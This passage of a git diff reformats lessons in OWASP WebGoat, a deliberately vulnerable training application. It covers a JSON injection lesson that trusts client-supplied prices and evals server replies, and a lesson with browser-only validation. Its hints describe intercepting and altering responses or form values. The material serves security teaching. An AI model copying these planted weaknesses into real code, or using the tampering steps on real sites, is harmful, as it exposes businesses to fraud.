+		{
+			String price = s.getParser().getRawParameter("price2Submit", "");
+			price = price.replace("$", "");
+			if (Integer.parseInt(price) < 600)
+			{
+				makeSuccess(s);
+			}
+			else
+			{
+				s.setMessage("You are close, try to set the price for the non-stop flight to be less than $600");
+			}
+		}
+		return ec;
 	}
-	catch (Exception ex)
+
+	public Element getCredits()
 	{
-	    ex.printStackTrace();
+		return super.getCustomCredits("Created by Sherif Koussa", MAC_LOGO);
 	}
 
-	Form form = new Form(getFormAction(), Form.POST).setName("form")
-		.setEncType("");
-	form.setOnSubmit("return check();");
-
-	form.addElement(createContent(s));
-
-	setContent(form);
-
-    }
-
-
-    /**
-     * Description of the Method
-     * 
-     * @param s Current WebSession
-     */
-
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	String lineSep = System.getProperty("line.separator");
-	String script = "<script>"
-		+ lineSep
-		+ "function getFlights() {"
-		+ lineSep
-		+ "var fromField = document.getElementById('"
-		+ TRAVEL_FROM
-		+ "');"
-		+ lineSep
-		+ "if (fromField.value.length < 3 || fromField.value!='BOS') { return; }"
-		+ lineSep
-		+ "var toField = document.getElementById('"
-		+ TRAVEL_TO
-		+ "');"
-		+ lineSep
-		+ "if (toField.value.length < 3 || toField.value!='SEA') { return; }"
-		+ lineSep
-		+ "var url = '" + getLink() 
-		+ "&from=ajax&"
-		+ TRAVEL_FROM
-		+ "=' + encodeURIComponent(fromField.value) +"
-		+ "'&"
-		+ TRAVEL_TO
-		+ "=' + encodeURIComponent(toField.value);"
-		+ lineSep
-		+ "if (typeof XMLHttpRequest != 'undefined') {"
-		+ lineSep
-		+ "req = new XMLHttpRequest();"
-		+ lineSep
-		+ "} else if (window.ActiveXObject) {"
-		+ lineSep
-		+ "req = new ActiveXObject('Microsoft.XMLHTTP');"
-		+ lineSep
-		+ "   }"
-		+ lineSep
-		+ "   req.open('GET', url, true);"
-		+ lineSep
-		+ "   req.onreadystatechange = callback;"
-		+ lineSep
-		+ "   req.send(null);"
-		+ lineSep
-		+ "}"
-		+ lineSep
-		+ "function callback() {"
-		+ lineSep
-		+ "    if (req.readyState == 4) { "
-		+ lineSep
-		+ "        if (req.status == 200) { "
-		+ lineSep
-		+ "                   var card = eval('(' + req.responseText + ')');"
-		+ lineSep
-		+ "			 var flightsDiv = document.getElementById('flightsDiv');"
-		+ lineSep
-		+ "				flightsDiv.innerHTML = '';"
-		+ lineSep
-		+ "				var strHTML='';"
-		+ lineSep
-		+ "				strHTML = '<tr><td>&nbsp;</td><td>No of Stops</td>';"
-		+ lineSep
-		+ "				strHTML = strHTML + '<td>Stops</td><td>Prices</td></tr>';"
-		+ lineSep
-		+ "			 for(var i=0; i<card.flights.length; i++){"
-		+ lineSep
-		+ "				var node = card.flights[i];"
-		+ lineSep
-		+ "				strHTML = strHTML + '<tr><td><input name=\"radio'+i+'\" type=\"radio\" id=\"radio'+i+'\"></td><td>';"
-		+ lineSep
-		+ "			    strHTML = strHTML + card.flights[i].stops + '</td><td>';"
-		+ lineSep
-		+ "			    strHTML = strHTML + card.flights[i].transit + '</td><td>';"
-		+ lineSep
-		+ "			    strHTML = strHTML + '<div name=\"priceID'+i+'\" id=\"priceID'+i+'\">' + card.flights[i].price + '</div></td></tr>';"
-		+ lineSep
-		+ "			 }"
-		+ lineSep
-		+ "				strHTML = '<table border=\"1\">' + strHTML + '</table>';"
-		+ lineSep
-		+ "               flightsDiv.innerHTML = strHTML;"
-		+ lineSep
-		+ "        }}}"
-		+ lineSep
-		+
-
-		"function check(){"
-		+ lineSep
-		+ " if ( document.getElementById('radio0').checked  )"
-		+ lineSep
-		+ " { document.getElementById('price2Submit').value = document.getElementById('priceID0').innerHTML; return true;}"
-		+ lineSep
-		+ " else if ( document.getElementById('radio1').checked  )"
-		+ lineSep
-		+ " { document.getElementById('price2Submit').value = document.getElementById('priceID1').innerHTML; return true;}"
-		+ lineSep + " else " + lineSep
-		+ " { alert('Please choose one flight'); return false;}" + lineSep + "}"
-		+ lineSep + "</script>" + lineSep;
-	ec.addElement(new StringElement(script));
-	Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0)
-		.setWidth("90%").setAlign("center");
-
-	TR tr = new TR();
-
-	tr.addElement(new TD("From: "));
-	Input in = new Input(Input.TEXT, TRAVEL_FROM, "");
-	in.addAttribute("onkeyup", "getFlights();");
-	in.addAttribute("id", TRAVEL_FROM);
-	tr.addElement(new TD(in));
-
-	t1.addElement(tr);
-
-	tr = new TR();
-	tr.addElement(new TD("To: "));
-	in = new Input(Input.TEXT, TRAVEL_TO, "");
-	in.addAttribute("onkeyup", "getFlights();");
-	in.addAttribute("id", TRAVEL_TO);
-	tr.addElement(new TD(in));
-
-	t1.addElement(tr);
-	ec.addElement(t1);
-
-	ec.addElement(new BR());
-	ec.addElement(new BR());
-	Div div = new Div();
-	div.addAttribute("name", "flightsDiv");
-	div.addAttribute("id", "flightsDiv");
-	ec.addElement(div);
-
-	Input b = new Input();
-	b.setType(Input.SUBMIT);
-	b.setValue("Submit");
-	b.setName("SUBMIT");
-	ec.addElement(b);
-
-	Input price2Submit = new Input();
-	price2Submit.setType(Input.HIDDEN);
-	price2Submit.setName("price2Submit");
-	price2Submit.setValue("");
-	price2Submit.addAttribute("id", "price2Submit");
-	ec.addElement(price2Submit);
-	if (s.getParser().getRawParameter("radio0", "").equals("on"))
+	protected Category getDefaultCategory()
 	{
-	    String price = s.getParser().getRawParameter("price2Submit", "");
-	    price = price.replace("$", "");
-	    if (Integer.parseInt(price) < 600)
-	    {
-		makeSuccess(s);
-	    }
-	    else
-	    {
-		s
-			.setMessage("You are close, try to set the price for the non-stop flight to be less than $600");
-	    }
+		return Category.AJAX_SECURITY;
 	}
-	return ec;
-    }
 
-    public Element getCredits()
-    {
-	return super.getCustomCredits("Created by Sherif Koussa", MAC_LOGO);
-    }
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("JSON stands for JavaScript Object Notation.");
+		hints.add("JSON is a way of representing data just like XML.");
+		hints.add("The JSON payload is easily interceptable.");
+		hints.add("Intercept the reply, change the $600 to $25.");
+		return hints;
 
-    protected Category getDefaultCategory()
-    {
-	return Category.AJAX_SECURITY;
-    }
+	}
 
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("JSON stands for JavaScript Object Notation.");
-	hints.add("JSON is a way of representing data just like XML.");
-	hints.add("The JSON payload is easily interceptable.");
-	hints.add("Intercept the reply, change the $600 to $25.");
-	return hints;
-
-    }
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("JSON Injection");
-    }
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("JSON Injection");
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java b/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java
index 84fad2cbd..2efd75c8e 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -13,321 +13,271 @@ import org.apache.ecs.html.IMG;
 import org.apache.ecs.html.Input;
 import org.apache.ecs.html.P;
 import org.apache.ecs.html.TextArea;
-
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 
 public class JavaScriptValidation extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-	ElementContainer ec = new ElementContainer();
-
-	// Regular expressions in Java and JavaScript compatible form
-
-	// Note: if you want to use the regex=new RegExp(\"" + regex + "\");" syntax
-
-	// you'll have to use \\\\d to indicate a digit for example -- one escaping for Java and one for JavaScript
-
-	String regex1 = "^[a-z]{3}$";// any three lowercase letters
-	String regex2 = "^[0-9]{3}$";// any three digits
-	String regex3 = "^[a-zA-Z0-9 ]*$";// alphanumerics and space without punctuation
-	String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";// enumeration of numbers
-	String regex5 = "^\\d{5}$";// simple zip code
-	String regex6 = "^\\d{5}(-\\d{4})?$";// zip with optional dash-four
-	String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";//US phone number with or without dashes
-	Pattern pattern1 = Pattern.compile(regex1);
-	Pattern pattern2 = Pattern.compile(regex2);
-	Pattern pattern3 = Pattern.compile(regex3);
-	Pattern pattern4 = Pattern.compile(regex4);
-	Pattern pattern5 = Pattern.compile(regex5);
-	Pattern pattern6 = Pattern.compile(regex6);
-	Pattern pattern7 = Pattern.compile(regex7);
-	String lineSep = System.getProperty("line.separator");
-	String script = "<SCRIPT>"
-		+ lineSep
-		+ "regex1=/"
-		+ regex1
-		+ "/;"
-		+ lineSep
-		+ "regex2=/"
-		+ regex2
-		+ "/;"
-		+ lineSep
-		+ "regex3=/"
-		+ regex3
-		+ "/;"
-		+ lineSep
-		+ "regex4=/"
-		+ regex4
-		+ "/;"
-		+ lineSep
-		+ "regex5=/"
-		+ regex5
-		+ "/;"
-		+ lineSep
-		+ "regex6=/"
-		+ regex6
-		+ "/;"
-		+ lineSep
-		+ "regex7=/"
-		+ regex7
-		+ "/;"
-		+ lineSep
-		+ "function validate() { "
-		+ lineSep
-		+ "msg='JavaScript found form errors'; err=0; "
-		+ lineSep
-		+ "if (!regex1.test(document.form.field1.value)) {err+=1; msg+='\\n  bad field1';}"
-		+ lineSep
-		+ "if (!regex2.test(document.form.field2.value)) {err+=1; msg+='\\n  bad field2';}"
-		+ lineSep
-		+ "if (!regex3.test(document.form.field3.value)) {err+=1; msg+='\\n  bad field3';}"
-		+ lineSep
-		+ "if (!regex4.test(document.form.field4.value)) {err+=1; msg+='\\n  bad field4';}"
-		+ lineSep
-		+ "if (!regex5.test(document.form.field5.value)) {err+=1; msg+='\\n  bad field5';}"
-		+ lineSep
-		+ "if (!regex6.test(document.form.field6.value)) {err+=1; msg+='\\n  bad field6';}"
-		+ lineSep
-		+ "if (!regex7.test(document.form.field7.value)) {err+=1; msg+='\\n  bad field7';}"
-		+ lineSep + "if ( err > 0 ) alert(msg);" + lineSep
-		+ "else document.form.submit();" + lineSep + "} " + lineSep
-		+ "</SCRIPT>" + lineSep;
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    String param1 = s.getParser().getRawParameter("field1", "abc");
-	    String param2 = s.getParser().getRawParameter("field2", "123");
-	    String param3 = s.getParser().getRawParameter("field3",
-		    "abc 123 ABC");
-	    String param4 = s.getParser().getRawParameter("field4", "seven");
-	    String param5 = s.getParser().getRawParameter("field5", "90210");
-	    String param6 = s.getParser().getRawParameter("field6",
-		    "90210-1111");
-	    String param7 = s.getParser().getRawParameter("field7",
-		    "301-604-4882");
-	    ec.addElement(new StringElement(script));
-	    TextArea input1 = new TextArea("field1", 1, 25).addElement(param1);
-	    TextArea input2 = new TextArea("field2", 1, 25).addElement(param2);
-	    TextArea input3 = new TextArea("field3", 1, 25).addElement(param3);
-	    TextArea input4 = new TextArea("field4", 1, 25).addElement(param4);
-	    TextArea input5 = new TextArea("field5", 1, 25).addElement(param5);
-	    TextArea input6 = new TextArea("field6", 1, 25).addElement(param6);
-	    TextArea input7 = new TextArea("field7", 1, 25).addElement(param7);
 
-	    Input b = new Input();
-	    b.setType(Input.BUTTON);
-	    b.setValue("Submit");
-	    b.addAttribute("onclick", "validate();");
-	    ec.addElement(new Div().addElement(new StringElement(
-		    "Field1: exactly three lowercase characters (" + regex1
-			    + ")")));
-	    ec.addElement(new Div().addElement(input1));
-	    ec.addElement(new P());
-	    ec.addElement(new Div().addElement(new StringElement(
-		    "Field2: exactly three digits (" + regex2 + ")")));
-	    ec.addElement(new Div().addElement(input2));
-	    ec.addElement(new P());
-	    ec.addElement(new Div()
-		    .addElement(new StringElement(
-			    "Field3: letters, numbers, and space only ("
-				    + regex3 + ")")));
-	    ec.addElement(new Div().addElement(input3));
-	    ec.addElement(new P());
-	    ec.addElement(new Div().addElement(new StringElement(
-		    "Field4: enumeration of numbers (" + regex4 + ")")));
-	    ec.addElement(new Div().addElement(input4));
-	    ec.addElement(new P());
-	    ec.addElement(new Div().addElement(new StringElement(
-		    "Field5: simple zip code (" + regex5 + ")")));
-	    ec.addElement(new Div().addElement(input5));
-	    ec.addElement(new P());
-	    ec.addElement(new Div().addElement(new StringElement(
-		    "Field6: zip with optional dash four (" + regex6 + ")")));
-	    ec.addElement(new Div().addElement(input6));
-	    ec.addElement(new P());
-	    ec.addElement(new Div().addElement(new StringElement(
-		    "Field7: US phone number with or without dashes (" + regex7
-			    + ")")));
-	    ec.addElement(new Div().addElement(input7));
-	    ec.addElement(new P());
-	    ec.addElement(b);
+		ElementContainer ec = new ElementContainer();
 
-	    // Check the patterns on the server -- and note the errors in the response
-	    // these should never match unless the client side pattern script doesn't work
+		// Regular expressions in Java and JavaScript compatible form
 
-	    int err = 0;
-	    String msg = "";
+		// Note: if you want to use the regex=new RegExp(\"" + regex + "\");" syntax
 
-	    if (!pattern1.matcher(param1).matches())
-	    {
-		err++;
-		msg += "<BR>Server side validation violation: You succeeded for Field1.";
-	    }
+		// you'll have to use \\\\d to indicate a digit for example -- one escaping for Java and one
+		// for JavaScript
 
-	    if (!pattern2.matcher(param2).matches())
-	    {
-		err++;
-		msg += "<BR>Server side validation violation:  You succeeded for Field2.";
-	    }
+		String regex1 = "^[a-z]{3}$";// any three lowercase letters
+		String regex2 = "^[0-9]{3}$";// any three digits
+		String regex3 = "^[a-zA-Z0-9 ]*$";// alphanumerics and space without punctuation
+		String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";// enumeration of
+																			// numbers
+		String regex5 = "^\\d{5}$";// simple zip code
+		String regex6 = "^\\d{5}(-\\d{4})?$";// zip with optional dash-four
+		String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";// US phone number with or without dashes
+		Pattern pattern1 = Pattern.compile(regex1);
+		Pattern pattern2 = Pattern.compile(regex2);
+		Pattern pattern3 = Pattern.compile(regex3);
+		Pattern pattern4 = Pattern.compile(regex4);
+		Pattern pattern5 = Pattern.compile(regex5);
+		Pattern pattern6 = Pattern.compile(regex6);
+		Pattern pattern7 = Pattern.compile(regex7);
+		String lineSep = System.getProperty("line.separator");
+		String script = "<SCRIPT>" + lineSep + "regex1=/" + regex1 + "/;" + lineSep + "regex2=/" + regex2 + "/;"
+				+ lineSep + "regex3=/" + regex3 + "/;" + lineSep + "regex4=/" + regex4 + "/;" + lineSep + "regex5=/"
+				+ regex5 + "/;" + lineSep + "regex6=/" + regex6 + "/;" + lineSep + "regex7=/" + regex7 + "/;" + lineSep
+				+ "function validate() { " + lineSep + "msg='JavaScript found form errors'; err=0; " + lineSep
+				+ "if (!regex1.test(document.form.field1.value)) {err+=1; msg+='\\n  bad field1';}" + lineSep
+				+ "if (!regex2.test(document.form.field2.value)) {err+=1; msg+='\\n  bad field2';}" + lineSep
+				+ "if (!regex3.test(document.form.field3.value)) {err+=1; msg+='\\n  bad field3';}" + lineSep
+				+ "if (!regex4.test(document.form.field4.value)) {err+=1; msg+='\\n  bad field4';}" + lineSep
+				+ "if (!regex5.test(document.form.field5.value)) {err+=1; msg+='\\n  bad field5';}" + lineSep
+				+ "if (!regex6.test(document.form.field6.value)) {err+=1; msg+='\\n  bad field6';}" + lineSep
+				+ "if (!regex7.test(document.form.field7.value)) {err+=1; msg+='\\n  bad field7';}" + lineSep
+				+ "if ( err > 0 ) alert(msg);" + lineSep + "else document.form.submit();" + lineSep + "} " + lineSep
+				+ "</SCRIPT>" + lineSep;
+		try
+		{
+			String param1 = s.getParser().getRawParameter("field1", "abc");
+			String param2 = s.getParser().getRawParameter("field2", "123");
+			String param3 = s.getParser().getRawParameter("field3", "abc 123 ABC");
+			String param4 = s.getParser().getRawParameter("field4", "seven");
+			String param5 = s.getParser().getRawParameter("field5", "90210");
+			String param6 = s.getParser().getRawParameter("field6", "90210-1111");
+			String param7 = s.getParser().getRawParameter("field7", "301-604-4882");
+			ec.addElement(new StringElement(script));
+			TextArea input1 = new TextArea("field1", 1, 25).addElement(param1);
+			TextArea input2 = new TextArea("field2", 1, 25).addElement(param2);
+			TextArea input3 = new TextArea("field3", 1, 25).addElement(param3);
+			TextArea input4 = new TextArea("field4", 1, 25).addElement(param4);
+			TextArea input5 = new TextArea("field5", 1, 25).addElement(param5);
+			TextArea input6 = new TextArea("field6", 1, 25).addElement(param6);
+			TextArea input7 = new TextArea("field7", 1, 25).addElement(param7);
 
-	    if (!pattern3.matcher(param3).matches())
-	    {
-		err++;
-		msg += "<BR>Server side validation violation:  You succeeded for Field3.";
-	    }
+			Input b = new Input();
+			b.setType(Input.BUTTON);
+			b.setValue("Submit");
+			b.addAttribute("onclick", "validate();");
+			ec.addElement(new Div().addElement(new StringElement("Field1: exactly three lowercase characters ("
+					+ regex1 + ")")));
+			ec.addElement(new Div().addElement(input1));
+			ec.addElement(new P());
+			ec.addElement(new Div().addElement(new StringElement("Field2: exactly three digits (" + regex2 + ")")));
+			ec.addElement(new Div().addElement(input2));
+			ec.addElement(new P());
+			ec.addElement(new Div().addElement(new StringElement("Field3: letters, numbers, and space only (" + regex3
+					+ ")")));
+			ec.addElement(new Div().addElement(input3));
+			ec.addElement(new P());
+			ec.addElement(new Div().addElement(new StringElement("Field4: enumeration of numbers (" + regex4 + ")")));
+			ec.addElement(new Div().addElement(input4));
+			ec.addElement(new P());
+			ec.addElement(new Div().addElement(new StringElement("Field5: simple zip code (" + regex5 + ")")));
+			ec.addElement(new Div().addElement(input5));
+			ec.addElement(new P());
+			ec.addElement(new Div()
+					.addElement(new StringElement("Field6: zip with optional dash four (" + regex6 + ")")));
+			ec.addElement(new Div().addElement(input6));
+			ec.addElement(new P());
+			ec.addElement(new Div().addElement(new StringElement("Field7: US phone number with or without dashes ("
+					+ regex7 + ")")));
+			ec.addElement(new Div().addElement(input7));
+			ec.addElement(new P());
+			ec.addElement(b);
 
-	    if (!pattern4.matcher(param4).matches())
-	    {
-		err++;
-		msg += "<BR>Server side validation violation:  You succeeded for Field4.";
-	    }
+			// Check the patterns on the server -- and note the errors in the response
+			// these should never match unless the client side pattern script doesn't work
 
-	    if (!pattern5.matcher(param5).matches())
-	    {
-		err++;
-		msg += "<BR>Server side validation violation:  You succeeded for Field5.";
-	    }
+			int err = 0;
+			String msg = "";
 
-	    if (!pattern6.matcher(param6).matches())
-	    {
-		err++;
-		msg += "<BR>Server side validation violation:  You succeeded for Field6.";
-	    }
+			if (!pattern1.matcher(param1).matches())
+			{
+				err++;
+				msg += "<BR>Server side validation violation: You succeeded for Field1.";
+			}
 
-	    if (!pattern7.matcher(param7).matches())
-	    {
-		err++;
-		msg += "<BR>Server side validation violation:  You succeeded for Field7.";
-	    }
+			if (!pattern2.matcher(param2).matches())
+			{
+				err++;
+				msg += "<BR>Server side validation violation:  You succeeded for Field2.";
+			}
 
-	    if (err > 0)
-	    {
-		s.setMessage(msg);
-	    }
-	    if (err >= 7)
-	    {
-		// This means they defeated all the client side checks
-		makeSuccess(s);
-	    }
+			if (!pattern3.matcher(param3).matches())
+			{
+				err++;
+				msg += "<BR>Server side validation violation:  You succeeded for Field3.";
+			}
+
+			if (!pattern4.matcher(param4).matches())
+			{
+				err++;
+				msg += "<BR>Server side validation violation:  You succeeded for Field4.";
+			}
+
+			if (!pattern5.matcher(param5).matches())
+			{
+				err++;
+				msg += "<BR>Server side validation violation:  You succeeded for Field5.";
+			}
+
+			if (!pattern6.matcher(param6).matches())
+			{
+				err++;
+				msg += "<BR>Server side validation violation:  You succeeded for Field6.";
+			}
+
+			if (!pattern7.matcher(param7).matches())
+			{
+				err++;
+				msg += "<BR>Server side validation violation:  You succeeded for Field7.";
+			}
+
+			if (err > 0)
+			{
+				s.setMessage(msg);
+			}
+			if (err >= 7)
+			{
+				// This means they defeated all the client side checks
+				makeSuccess(s);
+			}
+		}
+
+		catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (ec);
 	}
 
-	catch (Exception e)
+	/**
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return Category.UNVALIDATED_PARAMETERS;
 	}
 
-	return (ec);
-    }
+	/**
+	 * Gets the hints attribute of the AccessControlScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
 
+		hints.add("The validation is happening in your browser.");
+		hints.add("Try modifying the values with a proxy after they leave your browser");
+		hints.add("Another way is to delete the JavaScript before you view the page.");
 
-    /**
-     *  DOCUMENT ME!
-     *
-     * @return    DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.UNVALIDATED_PARAMETERS;
-    }
+		return hints;
+	}
 
+	/**
+	 * Gets the instructions attribute of the WeakAccessControl object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "This website performs both client and server side validation.  "
+				+ "For this exercise, your job is to break the client side validation and send the "
+				+ " website input that it wasn't expecting."
+				+ "<b> You must break all 7 validators at the same time. </b>";
+		return (instructions);
+	}
 
-    /**
-     *  Gets the hints attribute of the AccessControlScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
+	private final static Integer DEFAULT_RANKING = new Integer(120);
 
-	hints.add("The validation is happening in your browser.");
-	hints
-		.add("Try modifying the values with a proxy after they leave your browser");
-	hints
-		.add("Another way is to delete the JavaScript before you view the page.");
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-	return hints;
-    }
+	/**
+	 * Gets the title attribute of the AccessControlScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Bypass Client Side JavaScript Validation");
+	}
 
-
-    /**
-     *  Gets the instructions attribute of the WeakAccessControl object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "This website performs both client and server side validation.  "
-		+ "For this exercise, your job is to break the client side validation and send the "
-		+ " website input that it wasn't expecting."
-		+ "<b> You must break all 7 validators at the same time. </b>";
-	return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(120);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the AccessControlScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Bypass Client Side JavaScript Validation");
-    }
-    
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java
index 47ef1765f..a1e14e1b4 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.BufferedReader;
 import java.io.FileReader;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -18,274 +18,254 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public abstract class LessonAdapter extends AbstractLesson
 {
 
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		// Mark this lesson as completed.
+		makeSuccess(s);
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	// Mark this lesson as completed.  
-	makeSuccess(s);
+		ElementContainer ec = new ElementContainer();
 
-	ElementContainer ec = new ElementContainer();
-
-	ec
-		.addElement(new Center().addElement(new H3()
-			.addElement(new StringElement(
+		ec.addElement(new Center().addElement(new H3().addElement(new StringElement(
 				"Detailed Lesson Creation Instructions."))));
-	ec.addElement(new P());
-	ec
-		.addElement(new StringElement(
-			"Lesson are simple to create and very little coding is required. &nbsp;&nbsp;"
-				+ "In fact, most lessons can be created by following the easy to use instructions in the "
-				+ "<A HREF=http://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents>WebGoat User Guide.</A>&nbsp;&nbsp;"
-				+ "If you would prefer, send your lesson ideas to "
-				+ getWebgoatContext().getFeedbackAddress()));
+		ec.addElement(new P());
+		ec
+				.addElement(new StringElement(
